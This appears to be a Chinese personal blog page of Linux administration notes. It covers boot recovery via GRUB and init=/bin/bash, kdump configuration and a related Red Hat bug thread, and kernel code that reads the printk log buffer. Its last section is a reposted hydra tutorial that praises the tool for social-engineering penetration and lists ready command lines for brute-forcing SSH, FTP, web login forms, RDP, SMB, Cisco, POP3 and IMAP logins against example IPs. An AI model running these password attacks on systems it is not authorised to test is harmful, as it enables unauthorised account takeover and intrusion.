kk Blog —— 通用基础


date [-d @int|str] [+%s|"+%F %T"]
netstat -ltunp

Linux 即时修改 启动级别 启动参数 磁盘满无法进系统 忘记密码

1、修改启动级别错误配置的方法

如果你不小心把级别设成0或6,用下边的方法补救:
1. 启动系统后,在倒计时结束前按任意键,进入grub引导界面
2. 在grub引导界面的输入‘e’,进入下一级,高亮第二行,再输入‘e’
3. 在最后输入 1[单用户模式] 按回车回到上一级(单用户模式启动不会去读取/etc/inittab) 4. 输入‘b’重启系统

也可以改其他启动参数 进行紧急引导最简单的方法是:
把 init=/bin/bash 或 init=/bin/sh 选项传递给内核

2、磁盘满导致无法进入系统

删除一些文件后重启
没法删除 说文件系统是只读的 ,重新mount 你的磁盘系统为可读写的。

1
mount -o remount,rw  /
3、忘记密码

passwd user

kexec-tools-1.102pre-164.el5 之前的有问题

kexec-tools-1.102pre-154.el5 会直接进入 dump.img,于是便看到单CPU在跑,内存只有crashkernel中大小的情况。但是指定了ext /dev/sd* 后就能正常。其他问题就是它通过网络时只会走eth0,不然就失败。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
e2fsck 1.38 (30-Jun-2005)
fsck.ext3: while determining whether /dev/sda2 is mounted.
/: recovering journal
/: clean, 100877/4653056 files, 1236284/4648809 blocks
Mounting root filesystem.
Trying mount -t ext4 /dev/sda2 /sysroot
Trying mount -t ext3 /dev/sda2 /sysroot
Using ext3 on root filesystem
Switching to new root and running init.
^MINIT: version 2.86 booting^M
	        Welcome to  CentOS release 5.8 (Final)
	        Press 'I' to enter interactive startup.
Cannot access the Hardware Clock via any known method.
Use the --debug option to see the details of our search for an access method.
Setting clock  (utc): Tue Aug  5 19:18:49 PDT 2014 [  OK  ]^M
Starting udev: [  OK  ]^M

ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/kexec-tools-1.102pre-154.el5.src.rpm

vim mkdumprd


https://bugzilla.redhat.com/show_bug.cgi?id=788678

Hmm, after a second thought, did you put the block device mounted on /var into your /etc/kdump.conf? Something like:

ext3 /dev/sdbX #the device mounted on /var path crash #relative path inside /var

? Please share your kdump.conf if possible.

Thanks!

The point is to not touch the default kdump.conf, and mkdumprd should just work, like it does in RHEL6.

If I do put the ext3 and path directives into kdump.conf, then of course things work fine, but it shouldn’t be needed for the stock case where you just want to dump to /var/crash on your local filesystem.

Yeah… I saw how RHEL6 handles this, will try to backport it to RHEL5. Thanks!

Created attachment 594144 detailsProposed Patch v3

Ok, let’s just remove the UUID converting code.

Yep - it works now!

… almost. I’m pretty sure that the RHEL6 default mkdumprd uses makedumpfile by default so it isn’t just using “cp” to create the vmcore file.

The currently-patched version appears to just use “cp” instead.

Yeah, this is expected, because we don’t have a chance to change the default core_collector to makedumpfile on RHEL5, so “cp” is still the default one. :)

Thanks for testing!

log_buf(ring buffer)(syslog)(printk)

printk 的输出都是保存在log_buf里的

How to read it the ring buffer? Here is a beautiful illustration from IBM Developerworks dmesg would be your first resort! How does dmesg accomplish its task? By a call to syslog()! How does syslog do its job? Through the system call interface which in turn call do_syslog(). do_syslog() does the finishing act like this

alt

// 模仿kernel/printk.c中do_syslog,在module 中读printk输出的最后4k

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
char **log_buf;
int *log_buf_len, *log_start, *log_end;

int MASK;
int end, len;
unsigned i, j, limit, count;
char c;
int ret;


log_buf = (char**) 0xffffffff803270e0;
log_buf_len = (int*)0xffffffff803270d8;
log_start = (int*) 0xffffffff804eabd0;
log_end = (int*) 0xffffffff804eabe0;

i = 0;
end = *log_end;
len = *log_buf_len;
MASK = len - 1;

count = L;
if (count > len) count = len;
limit = end;

for (i=0;i<count;i++) {
        j = limit-1-i;
        c = *(*log_buf + (j&MASK));
        if (c == '\0') c = '\n';
        buf[count-1-i] = c;
}

// 输出

file = filp_open(file_path, O_RDWR|O_CREAT|O_APPEND, 0777);
if(IS_ERR(file)) {
        printk("Open file %s failed..\n", file_path);
        return 0;
}
old_fs = get_fs();
set_fs(get_ds());
ret = file->f_op->write(file, buf, i, &file->f_pos);
file->f_op->fsync(file, file->f_dentry, 0);
set_fs(old_fs);
filp_close(file, NULL);

kdump conf

cat /etc/kdump.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
# Configures where to put the kdump /proc/vmcore files
#
# This file contains a series of commands to perform (in order) when a
# kernel crash has happened and the kdump kernel has been loaded.  Directives in
# this file are only applicable to the kdump initramfs, and have no effect if
# the root filesystem is mounted and the normal init scripts are processed
#
# Currently only one dump target and path may be configured at a time. If dump
# to configured dump target fails, the default action will be preformed.
# Default action may be configured with the "default" directive below.
#
# Basics commands supported are:
# path <path>           - Append path to the filesystem device which you are
#                         dumping to.  Ignored for raw device dumps.
#                         If unset, will default to /var/crash.
#
# core_collector <command> <options>
#                       - This allows you to specify the command to copy the
#                         vmcore.  You could use the dump filtering program
#                         makedumpfile, the default one, to retrieve your core,
#                         which on some arches can drastically reduce core file
#                         size. See /usr/sbin/makedumpfile --help for a list of
#                         options. Note that the -i and -g options are not
#                         needed here, as the initrd will automatically be
#                         populated with a config file appropriate for the
#                         running kernel.
#                         For ssh dump, scp should be used instead of cp.
#
# raw <partition>       - Will write /proc/vmcore into raw <partition>.
#
# nfs <nfs mount>       - Will mount fs and copy /proc/vmcore to
#                         <mnt>/<path>/%HOST-%DATE/, supports DNS.
#
# nfs4 <nfs mount>      - Will use NFSv4 instead of NFSv3
#
# net <nfs mount>       - This is a deprecated option to transfer vmcore over
#                         nfs.  Use "nfs" option instead.
#
# ssh <user@server>     - Will copy /proc/vmcore to
#                         <user@server>:<path>/%HOST-%DATE/ via SSH,
#                         supports DNS. If makedumpfile is the core_collector,
#                         it is piped to an "ssh" shell, otherwise use the
#                         specified core_collector like scp.
#                         NOTE: make sure user has necessary write
#                         permissions on server
#
# net <user@server>     - This is a deprecated option to transfer vmcore over
#                         ssh.  Use "ssh" option instead.
#
# <fs type> <partition> - Will mount -t <fs type> <partition> /mnt and copy
#                         /proc/vmcore to /mnt/<path>/127.0.0.1-%DATE/.
#                         NOTE: <partition> can be a device node, label or uuid.
#
# disk_timeout <seconds>
#                       - Number of seconds to wait for disks to appear prior
#                         to continue to save dump. By default kdump waits
#                         180 seconds for the disks to show up it needs. This
#                         can be useful in some cases if disk never shows up
#                         (Either because disk was removed or because kdump is
#                         waiting on wrong disk).
#
# link_delay <seconds>
#                       - Some network cards take a long time to initialize, and
#                         some spanning tree enabled networks do not transmit
#                         user traffic for long periods after a link state
#                         changes.  This optional parameter defines a wait
#                         period after a link is activated in which the
#                         initramfs will wait before attempting to transmit
#                         user data.
#
# kdump_post <binary | script>
#                       - This directive allows you to run a specified
#                         executable just after the memory dump process
#                         terminates. The exit status from the dump process
#                         is fed to the kdump_post executable, which can be
#                         used to trigger different actions for success or
#                         failure.
#
# kdump_pre <binary | script>
#                       - works just like the kdump_post directive, but instead
#                         of running after the dump process, runs immediately
#                         before.  Exit status of this binary is interpreted
#                         as follows:
#                         0 - continue with dump process as usual
#                         non 0 - reboot/halt the system
#
# extra_bins <binaries | shell scripts>
#                       - This directive allows you to specify additional
#                         binaries or shell scripts you'd like to include in
#                         your kdump initrd. Generally only useful in
#                         conjunction with a kdump_post binary or script that
#                         relies on other binaries or scripts.
#
# extra_modules <module(s)>
#                       - This directive allows you to specify extra kernel
#                         modules that you want to be loaded in the kdump
#                         initrd, typically used to set up access to
#                         non-boot-path dump targets that might otherwise
#                         not be accessible in the kdump environment. Multiple
#                         modules can be listed, separated by a space, and any
#                         dependent modules will automatically be included.
#                         Module name should be specified without ".ko" suffix.
#
# options <module> <option list>
#                       - This directive allows you to specify options to apply
#                         to modules in the initramfs.  This directive overrides
#                         options specified in /etc/modprobe.conf. Module name
#                         should be specified without ".ko" suffix.
#
# blacklist <module|directory>
#                       - Prevents modules from being loaded in the initframfs,
#                         either directly during auto-created insmod calls or as
#                         a dependency of another module load. A specific module
#                         or a directory can be specified. In the latter case,
#                         all modules found below the specified directory will
#                         be excluded. This directive can be specified multiple
#                         times or as a space separated list. Module name should
#                         be specified without ".ko" suffix.
#
# sshkey <path>
#                       - Specifies the path of the ssh identity file you want
#                         to use when doing ssh dump. It must be a private key,
#                         the default value is /root/.ssh/kdump_id_rsa. When
#                         progagating public key, the key is assumed to be
#                         identity_file.pub which by default is
#                         /root/.ssh/kdump_id_rsa.pub.
#
# default <reboot | halt | poweroff | shell | mount_root_run_init>
#                       - Action to preform in case dumping to intended target
#                         fails. If no default action is specified, "reboot"
#                         is assumed default.
#
#                         reboot: If the default action is reboot simply reboot
#                                 the system and loose the core that you are
#                                 trying to retrieve.
#                         halt:   If the default action is halt, then simply
#                                 halt the system after attempting to capture
#                                 a vmcore, regardless of success or failure.
#                         poweroff: The system will be powered down
#                         shell:  If the default action is shell, then drop to
#                                 an hush session inside the initramfs from
#                                 where you can try to record the core manually.
#                                 Exiting this shell reboots the system.
#            mount_root_run_init: Mount root filesystem and run init. Kdump
#                                   initscript will try to save dump to root
#                                   filesystem in /var/crash dir. This will
#                                   likely require a lot more memory to
#                                   be reserved for kdump kernel.
#
# debug_mem_level <0-3>
#                       - Turns on debug/verbose output of kdump scripts
#                         regarding free/used memory at various points of
#                         execution. Higher level means more debugging output.
#                         0 - no output
#                         1 - partial /proc/meminfo
#                         2 - /proc/meminfo
#                         3 - /proc/meminfo + /proc/slabinfo
#
# force_rebuild <0 | 1>
#                       - By default, kdump initrd only will be rebuilt when
#                         necessary. Specify 1 here to force rebuilding kdump
#                         initrd every time when kdump service starts.

暴力密码破解工具--关键在于字典

http://www.ha97.com/5186.html

  • PS:这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。

一、简介

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。官 网:http://www.thc.org/thc-hydra ,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

二、安装

如果是Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装:

1
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

Redhat/Fedora发行版的下载源码包编译安装,先安装相关依赖包:

1
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

hydra下载地址: http://www.thc.org/releases/hydra-7.3.tar.gz

1
2
3
4
5
# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make install

hydra支持GUI图形界面。

三、参数说明

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。

server 目标ip service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。 OPT 可选项

四、各种用法实例

简单演示:

破解成功,直接显示结果,上图画红线的地方就是破解出来的密码,也可以通过参数-o输出到文件里。如果字典够强大,结合社工,密码不用很久就出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"


hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,
-f 当破解了一个密码就停止, 10.36.16.18目标ip,
http-post-form表示破解是采用http的post方式提交的表单密码破解,
<title>中 的内容是表示错误猜解的返回信息提示。)

5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN